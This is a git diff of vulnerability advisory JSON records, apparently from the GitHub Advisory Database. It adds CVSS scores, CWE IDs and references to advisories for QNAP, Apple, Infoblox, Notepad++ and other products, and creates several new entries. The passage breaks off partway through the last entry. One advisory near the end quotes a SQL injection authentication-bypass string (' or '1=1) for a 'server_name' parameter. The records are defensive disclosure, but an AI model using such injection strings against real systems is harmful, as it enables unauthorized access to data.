"severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T19:15:50Z" diff --git a/advisories/unreviewed/2026/02/GHSA-c6jr-3394-hq95/GHSA-c6jr-3394-hq95.json b/advisories/unreviewed/2026/02/GHSA-c6jr-3394-hq95/GHSA-c6jr-3394-hq95.json index 047ea8ef6317c..fa9c8fa0513c7 100644 --- a/advisories/unreviewed/2026/02/GHSA-c6jr-3394-hq95/GHSA-c6jr-3394-hq95.json +++ b/advisories/unreviewed/2026/02/GHSA-c6jr-3394-hq95/GHSA-c6jr-3394-hq95.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c6jr-3394-hq95", - "modified": "2026-02-12T18:30:24Z", + "modified": "2026-02-12T21:31:27Z", "published": "2026-02-12T18:30:24Z", "aliases": [ "CVE-2025-63421" ], "details": "An issue in filosoft Comerc.32 Commercial Invoicing v.16.0.0.3 allows a local attacker to execute arbitrary code via the comeinst.exe file", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T18:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cpw4-rfmm-h598/GHSA-cpw4-rfmm-h598.json b/advisories/unreviewed/2026/02/GHSA-cpw4-rfmm-h598/GHSA-cpw4-rfmm-h598.json index 6cbbb73bef103..fe1358927df28 100644 --- a/advisories/unreviewed/2026/02/GHSA-cpw4-rfmm-h598/GHSA-cpw4-rfmm-h598.json +++ b/advisories/unreviewed/2026/02/GHSA-cpw4-rfmm-h598/GHSA-cpw4-rfmm-h598.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cpw4-rfmm-h598", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20676" ], "details": "This issue was addressed through improved state management. This issue is fixed in iOS 26.3 and iPadOS 26.3, Safari 26.3, macOS Tahoe 26.3, visionOS 26.3. A website may be able to track users through Safari web extensions.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -33,7 +38,7 @@ ], "database_specific": { "cwe_ids": [], - "severity": null, + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:09Z" diff --git a/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json b/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json index 701bf56828461..a604220a3fc44 100644 --- a/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json +++ b/advisories/unreviewed/2026/02/GHSA-cqx4-h5ph-3xj9/GHSA-cqx4-h5ph-3xj9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-cqx4-h5ph-3xj9", - "modified": "2026-02-03T03:30:26Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-03T03:30:26Z", "aliases": [ "CVE-2025-15556" @@ -31,10 +31,18 @@ "type": "WEB", "url": "https://community.notepad-plus-plus.org/topic/27298/notepad-v8-8-9-vulnerability-fix" }, + { + "type": "WEB", + "url": "https://notepad-plus-plus.org//news//clarification-security-incident" + }, { "type": "WEB", "url": "https://notepad-plus-plus.org/news/hijacked-incident-info-update" }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-15556" + }, { "type": "WEB", "url": "https://www.vulncheck.com/advisories/notepad-plus-plus-wingup-updater-lacks-update-integrity-verification" diff --git a/advisories/unreviewed/2026/02/GHSA-cx65-rpp3-qf6c/GHSA-cx65-rpp3-qf6c.json b/advisories/unreviewed/2026/02/GHSA-cx65-rpp3-qf6c/GHSA-cx65-rpp3-qf6c.json index f994f85da1e4d..7967a3b57480f 100644 --- a/advisories/unreviewed/2026/02/GHSA-cx65-rpp3-qf6c/GHSA-cx65-rpp3-qf6c.json +++ b/advisories/unreviewed/2026/02/GHSA-cx65-rpp3-qf6c/GHSA-cx65-rpp3-qf6c.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-cx65-rpp3-qf6c", - "modified": "2026-02-11T21:30:39Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T21:30:39Z", "aliases": [ "CVE-2025-70296" ], "details": "A stored HTML injection vulnerability in the Recipe Notes rendering component in Mealie 3.3.1 allows remote authenticated users to inject arbitrary HTML, resulting in user interface redressing within the recipe view.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -28,8 +33,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-77" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T19:15:50Z" diff --git a/advisories/unreviewed/2026/02/GHSA-f3h2-q66h-c9wp/GHSA-f3h2-q66h-c9wp.json b/advisories/unreviewed/2026/02/GHSA-f3h2-q66h-c9wp/GHSA-f3h2-q66h-c9wp.json index c433a2c029b81..7b64b4d4da888 100644 --- a/advisories/unreviewed/2026/02/GHSA-f3h2-q66h-c9wp/GHSA-f3h2-q66h-c9wp.json +++ b/advisories/unreviewed/2026/02/GHSA-f3h2-q66h-c9wp/GHSA-f3h2-q66h-c9wp.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f3h2-q66h-c9wp", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20648" ], "details": "A privacy issue was addressed by moving sensitive data to a protected location. This issue is fixed in macOS Tahoe 26.3. A malicious app may be able to access notifications from other iCloud devices.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-g4c6-xx88-2hqq/GHSA-g4c6-xx88-2hqq.json b/advisories/unreviewed/2026/02/GHSA-g4c6-xx88-2hqq/GHSA-g4c6-xx88-2hqq.json index 2b4ca3382c787..a102298d7bcab 100644 --- a/advisories/unreviewed/2026/02/GHSA-g4c6-xx88-2hqq/GHSA-g4c6-xx88-2hqq.json +++ b/advisories/unreviewed/2026/02/GHSA-g4c6-xx88-2hqq/GHSA-g4c6-xx88-2hqq.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-g4c6-xx88-2hqq", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-62853" ], "details": "A path traversal vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5166 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-h3fv-27fp-2c8j/GHSA-h3fv-27fp-2c8j.json b/advisories/unreviewed/2026/02/GHSA-h3fv-27fp-2c8j/GHSA-h3fv-27fp-2c8j.json index 17ca1a1d7a97c..fecc387279ba2 100644 --- a/advisories/unreviewed/2026/02/GHSA-h3fv-27fp-2c8j/GHSA-h3fv-27fp-2c8j.json +++ b/advisories/unreviewed/2026/02/GHSA-h3fv-27fp-2c8j/GHSA-h3fv-27fp-2c8j.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h3fv-27fp-2c8j", - "modified": "2026-02-11T15:30:24Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:24Z", "aliases": [ "CVE-2024-56807" ], "details": "An out-of-bounds read vulnerability has been reported to affect Media Streaming add-on. If an attacker gains local network access, they can then exploit the vulnerability to obtain secret data.\n\nWe have already fixed the vulnerability in the following version:\nMedia Streaming add-on 500.1.1.6 ( 2024/08/02 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:P/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-h7qq-mch4-gjx3/GHSA-h7qq-mch4-gjx3.json b/advisories/unreviewed/2026/02/GHSA-h7qq-mch4-gjx3/GHSA-h7qq-mch4-gjx3.json index 616b9503b6a72..e74638ca9e0d2 100644 --- a/advisories/unreviewed/2026/02/GHSA-h7qq-mch4-gjx3/GHSA-h7qq-mch4-gjx3.json +++ b/advisories/unreviewed/2026/02/GHSA-h7qq-mch4-gjx3/GHSA-h7qq-mch4-gjx3.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-h7qq-mch4-gjx3", - "modified": "2026-02-11T15:30:24Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:24Z", "aliases": [ "CVE-2024-56808" ], "details": "A command injection vulnerability has been reported to affect Media Streaming add-on. If an attacker gains local network access who have also gained a user account, they can then exploit the vulnerability to execute arbitrary commands.\n\nWe have already fixed the vulnerability in the following version:\nMedia Streaming add-on 500.1.1.6 ( 2024/08/02 ) and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:P/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-j33g-vgfm-6pxv/GHSA-j33g-vgfm-6pxv.json b/advisories/unreviewed/2026/02/GHSA-j33g-vgfm-6pxv/GHSA-j33g-vgfm-6pxv.json index 35b4b4aead8b0..012cb4785c901 100644 --- a/advisories/unreviewed/2026/02/GHSA-j33g-vgfm-6pxv/GHSA-j33g-vgfm-6pxv.json +++ b/advisories/unreviewed/2026/02/GHSA-j33g-vgfm-6pxv/GHSA-j33g-vgfm-6pxv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j33g-vgfm-6pxv", - "modified": "2026-02-12T18:30:23Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T18:30:23Z", "aliases": [ "CVE-2025-61880" ], "details": "In Infoblox NIOS through 9.0.7, insecure deserialization can result in remote code execution.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T17:16:05Z" diff --git a/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json b/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json index 369d3a4c8bb12..4f5d06005c310 100644 --- a/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json +++ b/advisories/unreviewed/2026/02/GHSA-j5x8-2r52-c3ff/GHSA-j5x8-2r52-c3ff.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j5x8-2r52-c3ff", - "modified": "2026-02-12T15:32:47Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20700" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://support.apple.com/en-us/126353" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-20700" } ], "database_specific": { diff --git a/advisories/unreviewed/2026/02/GHSA-jhp8-jfxv-5ggj/GHSA-jhp8-jfxv-5ggj.json b/advisories/unreviewed/2026/02/GHSA-jhp8-jfxv-5ggj/GHSA-jhp8-jfxv-5ggj.json index 619ef446768cc..c85750a57e602 100644 --- a/advisories/unreviewed/2026/02/GHSA-jhp8-jfxv-5ggj/GHSA-jhp8-jfxv-5ggj.json +++ b/advisories/unreviewed/2026/02/GHSA-jhp8-jfxv-5ggj/GHSA-jhp8-jfxv-5ggj.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-jhp8-jfxv-5ggj", - "modified": "2026-02-12T00:31:05Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:05Z", "aliases": [ "CVE-2026-20652" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. A remote attacker may be able to cause a denial-of-service.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-400" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-mcfq-f994-8hqg/GHSA-mcfq-f994-8hqg.json b/advisories/unreviewed/2026/02/GHSA-mcfq-f994-8hqg/GHSA-mcfq-f994-8hqg.json index 9d181d0b7554d..ccf988c669d58 100644 --- a/advisories/unreviewed/2026/02/GHSA-mcfq-f994-8hqg/GHSA-mcfq-f994-8hqg.json +++ b/advisories/unreviewed/2026/02/GHSA-mcfq-f994-8hqg/GHSA-mcfq-f994-8hqg.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mcfq-f994-8hqg", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-57713" ], "details": "A weak authentication vulnerability has been reported to affect File Station 5. The remote attackers can then exploit the vulnerability to gain sensitive information.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5166 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json b/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json index c6302b82e675b..a3fcb58a32c52 100644 --- a/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json +++ b/advisories/unreviewed/2026/02/GHSA-p8ww-f2v2-hj7q/GHSA-p8ww-f2v2-hj7q.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-p8ww-f2v2-hj7q", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20638" ], "details": "A logic issue was addressed with improved checks. This issue is fixed in iOS 26.3 and iPadOS 26.3. A user with Live Caller ID app extensions turned off could have identifying information leaked to the extensions.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,8 +25,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-284" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:06Z" diff --git a/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json b/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json index 4d57914bfda18..11cebe327cd98 100644 --- a/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json +++ b/advisories/unreviewed/2026/02/GHSA-p94w-qfcw-pq69/GHSA-p94w-qfcw-pq69.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-p94w-qfcw-pq69", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2025-62854" ], "details": "An uncontrolled resource consumption vulnerability has been reported to affect File Station 5. If a remote attacker gains a user account, they can then exploit the vulnerability to launch a denial-of-service (DoS) attack.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json b/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json index b59e9d8b17bb1..49c817839a0d7 100644 --- a/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json +++ b/advisories/unreviewed/2026/02/GHSA-pjf9-xcq9-w388/GHSA-pjf9-xcq9-w388.json @@ -1,13 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-pjf9-xcq9-w388", - "modified": "2026-02-11T15:30:26Z", + "modified": "2026-02-12T21:31:25Z", "published": "2026-02-11T15:30:26Z", "aliases": [ "CVE-2026-22894" ], "details": "A path traversal vulnerability has been reported to affect File Station 6. If a remote attacker gains a user account, they can then exploit the vulnerability to read the contents of unexpected files or system data.\n\nWe have already fixed the vulnerability in the following version:\nFile Station 5 5.5.6.5190 and later", "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:U/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" diff --git a/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json b/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json index e7f92e6c59a1e..cb7943fc388a4 100644 --- a/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json +++ b/advisories/unreviewed/2026/02/GHSA-pxhf-qg7h-8x8m/GHSA-pxhf-qg7h-8x8m.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-pxhf-qg7h-8x8m", - "modified": "2026-02-12T00:31:04Z", + "modified": "2026-02-12T21:31:26Z", "published": "2026-02-12T00:31:04Z", "aliases": [ "CVE-2026-20644" ], "details": "The issue was addressed with improved memory handling. This issue is fixed in macOS Tahoe 26.3, iOS 18.7.5 and iPadOS 18.7.5, visionOS 26.3, iOS 26.3 and iPadOS 26.3, Safari 26.3. Processing maliciously crafted web content may lead to an unexpected process crash.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } + ], "affected": [], "references": [ { @@ -36,8 +41,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-11T23:16:07Z" diff --git a/advisories/unreviewed/2026/02/GHSA-q6f4-2qxx-8cww/GHSA-q6f4-2qxx-8cww.json b/advisories/unreviewed/2026/02/GHSA-q6f4-2qxx-8cww/GHSA-q6f4-2qxx-8cww.json new file mode 100644 index 0000000000000..9bea553681f87 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q6f4-2qxx-8cww/GHSA-q6f4-2qxx-8cww.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q6f4-2qxx-8cww", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2025-67433" + ], + "details": "A heap buffer overflow in the processRequest function of Open TFTP Server MultiThreaded v1.7 allows attackers to cause a Denial of Service (DoS) via a crafted DATA packet.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-67433" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Hyobin/f1b7d48d29e60a378bb9c88ba8b8080a" + }, + { + "type": "WEB", + "url": "https://gist.github.com/transparencybeam/f1b7d48d29e60a378bb9c88ba8b8080a" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/projects/tftp-server/files/tftp%20server%20multithreaded" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-q7w4-8rgm-gmv2/GHSA-q7w4-8rgm-gmv2.json b/advisories/unreviewed/2026/02/GHSA-q7w4-8rgm-gmv2/GHSA-q7w4-8rgm-gmv2.json new file mode 100644 index 0000000000000..fa9fd8957087f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-q7w4-8rgm-gmv2/GHSA-q7w4-8rgm-gmv2.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q7w4-8rgm-gmv2", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25344" + ], + "details": "Wondershare MobileGo 8.5.0 contains an insecure file permissions vulnerability that allows local users to modify executable files in the application directory. Attackers can replace the original MobileGo.exe with a malicious executable to create a new user account and add it to the Administrators group with full system access.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25344" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47667" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/mobilego-insecure-file-permissions" + }, + { + "type": "WEB", + "url": "https://www.wondershare.net" + }, + { + "type": "WEB", + "url": "https://www.wondershare.net/mobilego" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T20:16:01Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qg3j-47pf-jpxw/GHSA-qg3j-47pf-jpxw.json b/advisories/unreviewed/2026/02/GHSA-qg3j-47pf-jpxw/GHSA-qg3j-47pf-jpxw.json new file mode 100644 index 0000000000000..7170f5fe40b46 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qg3j-47pf-jpxw/GHSA-qg3j-47pf-jpxw.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qg3j-47pf-jpxw", + "modified": "2026-02-12T21:31:28Z", + "published": "2026-02-12T21:31:28Z", + "aliases": [ + "CVE-2026-0619" + ], + "details": "A reachable infinite loop via an integer wraparound is present in Silicon Labs' Matter SDK which allows an attacker to trigger a denial of service. A hard reset is required to recover the device.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0619" + }, + { + "type": "WEB", + "url": "https://community.silabs.com/068Vm00000gUB2g" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-190" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-12T21:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qjg6-3whf-x8q9/GHSA-qjg6-3whf-x8q9.json b/advisories/unreviewed/2026/02/GHSA-qjg6-3whf-x8q9/GHSA-qjg6-3whf-x8q9.json new file mode 100644 index 0000000000000..6dfeb840ac05c --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qjg6-3whf-x8q9/GHSA-qjg6-3whf-x8q9.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qjg6-3whf-x8q9", + "modified": "2026-02-12T21:31:27Z", + "published": "2026-02-12T21:31:27Z", + "aliases": [ + "CVE-2019-25346" + ], + "details": "TheSystem 1.0 contains a SQL injection vulnerability that allows attackers to bypass authentication by manipulating the 'server_name' parameter. Attackers can inject malicious SQL code like ' or '1=1 to retrieve unauthorized database records and potentially access sensitive system information.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25346" + }, + { + "type": "WEB", + "url": "https://github.com/kostasmitroglou/thesystem" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/47430" + }, + { + "type": 